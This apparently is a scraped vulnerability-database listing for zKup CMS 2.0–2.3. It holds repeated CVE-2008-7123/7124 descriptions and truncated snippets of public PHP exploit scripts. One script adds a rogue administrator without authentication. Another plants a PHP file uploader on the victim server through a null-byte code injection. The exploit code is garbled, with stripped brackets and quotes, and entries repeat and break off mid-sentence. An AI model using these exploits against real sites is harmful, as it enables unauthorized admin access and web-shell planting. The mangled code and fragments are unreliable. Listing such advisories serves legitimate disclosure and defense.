EUVD-2008-7082

Malware in sbrugna...

EUVD-2008-7083

Malware in sbrugna...

zKup CMS 2.0 <= 2.3 - Remote Add Admin Exploit

No description provided by source. !/usr/bin/php ?php / Name: zKup CMS v2.0 = v2.3 0-day exploit add admin Credits: Charles real F. charlesfolathotmail.fr Date: 03-08-2008 Conditions: None. This exploit add a new zKup admin. / print \n; print zKup CMS v2.0 = v2.3 0-day exploit add admin\n; print ...

CVE-2008-7124

zKup CMS 2.0 through 2.3 does not require administrative authentication for admin/configuration/modifier.php, which allows remote attackers to gain administrator privileges via a direct request, as demonstrated by adding a new administrator...

CVE-2008-7123

Static code injection vulnerability in admin/configuration/modifier.php in zKup CMS 2.0 through 2.3 allows remote attackers to inject arbitrary PHP code into fichiers/config.php via a null byte %00 in the login parameter in an ajout action, which bypasses the regular expression check...

Design/Logic Flaw

zKup CMS 2.0 through 2.3 does not require administrative authentication for admin/configuration/modifier.php, which allows remote attackers to gain administrator privileges via a direct request, as demonstrated by adding a new administrator...

Code injection

Static code injection vulnerability in admin/configuration/modifier.php in zKup CMS 2.0 through 2.3 allows remote attackers to inject arbitrary PHP code into fichiers/config.php via a null byte %00 in the login parameter in an ajout action, which bypasses the regular expression check...

CVE-2008-7123

Static code injection vulnerability in admin/configuration/modifier.php in zKup CMS 2.0 through 2.3 allows remote attackers to inject arbitrary PHP code into fichiers/config.php via a null byte %00 in the login parameter in an ajout action, which bypasses the regular expression check...

CVE-2008-7124

zKup CMS 2.0 through 2.3 does not require administrative authentication for admin/configuration/modifier.php, which allows remote attackers to gain administrator privileges via a direct request, as demonstrated by adding a new administrator...

CVE-2008-7123

CVE-2008-7123 affects zKup CMS 2.0–2.3. The vulnerability is a static code injection in admin/configuration/modifier.php that allows remote attackers to inject arbitrary PHP code into fichiers/config.php via a null byte (%00) in the login parameter during an ajout action, bypassing the regular ex...

CVE-2008-7124

zKup CMS versions 2.0–2.3 expose a direct-requests flaw: admin/configuration/modifier.php does not require administrative authentication, enabling remote attackers to gain administrator privileges by adding a new admin. Impact is described as privilege escalation to admin; exploitation details ar...

zkup-admin.txt

!/usr/bin/php Date: 03-08-2008 Conditions: None. This exploit add a new zKup admin. / print "\n"; print " zKup CMS v2.0 \n\n"; if$argc \n eg: php zkup2adminexploit.php http://127.0.0.1/votresite/ real p4ssw0rd";exit-1; $url = $argv1; $log = $argv2; $pas = $argv3; $postit =...

zKup CMS 2.0 &lt;= 2.3 Remote Add Admin Exploit

No description provided by source. !/usr/bin/php ?php / Name: zKup CMS v2.0 = v2.3 0-day exploit add admin Credits: Charles "real" F. charlesfolathotmail.fr Date: 03-08-2008 Conditions: None. This exploit add a new zKup admin. Thanks to darkfig, and his useful phpsploit class : / print "\n"; prin...

zKup CMS 2.0 &lt;= 2.3 Remote Upload Exploit

No description provided by source. !/usr/bin/php ?php / Name: zKup CMS v2.0 = v2.3 0-day exploit upload Credits: Charles "real" F. charlesfolathotmail.fr Date: 03-08-2008 Conditions: PHP Version This exploit spawn a php uploader in your victim's server. Okay, you may need explanations: First, we...

zKup CMS 2.0 2.3 - Arbitrary File Upload

zKup CMS 2.0 2.3 - Arbitrary File Upload !/usr/bin/php Date: 03-08-2008 Conditions: PHP Version, magicquotesgpc=Off This exploit spawn a php uploader in your victim's server. Okay, you may need explanations: First, we can use administration without being admin see ./admin/configuration/modifier.p...

zKup CMS 2.0 2.3 - Remote Add Admin

zKup CMS 2.0 2.3 - Remote Add Admin !/usr/bin/php Date: 03-08-2008 Conditions: None. This exploit add a new zKup admin. / print "\n"; print " zKup CMS v2.0 \n\n"; if$argc \n eg: php zkup2adminexploit.php http://127.0.0.1/votresite/ real p4ssw0rd";exit-1; $url = $argv1; $log = $argv2; $pas = $argv...

zKup CMS 2.0 <= 2.3 Remote Upload Exploit

Exploit for unknown platform in category web applications ========================================= zKup CMS 2.0 \n\n"; if$argc\n eg: php zkup2uploadexploit.php http://127.0.0.1/votresite/";exit-1; $url = $argv1; $code = ' ifisset$POST'upload' if !moveuploadedfile$FILES'file''tmpname',...

zKup CMS 2.0 <= 2.3 Remote Add Admin Exploit

Exploit for unknown platform in category web applications ============================================ zKup CMS 2.0 Date: 03-08-2008 Conditions: None. This exploit add a new zKup admin. / print "\n"; print " zKup CMS v2.0 \n\n"; if$argc \n eg: php zkup2adminexploit.php http://127.0.0.1/votresite/...

zKup CMS 2.0 &lt; 2.3 - Arbitrary File Upload

!/usr/bin/php Date: 03-08-2008 Conditions: PHP Version, magicquotesgpc=Off This exploit spawn a php uploader in your victim's server. Okay, you may need explanations: First, we can use administration without being admin see ./admin/configuration/modifier.php Then, when we add an admin, it is save...

zKup CMS 2.0 &lt; 2.3 - Remote Add Admin

!/usr/bin/php Date: 03-08-2008 Conditions: None. This exploit add a new zKup admin. / print "\n"; print " zKup CMS v2.0 \n\n"; if$argc \n eg: php zkup2adminexploit.php http://127.0.0.1/votresite/ real p4ssw0rd";exit-1; $url = $argv1; $log = $argv2; $pas = $argv3; $postit =...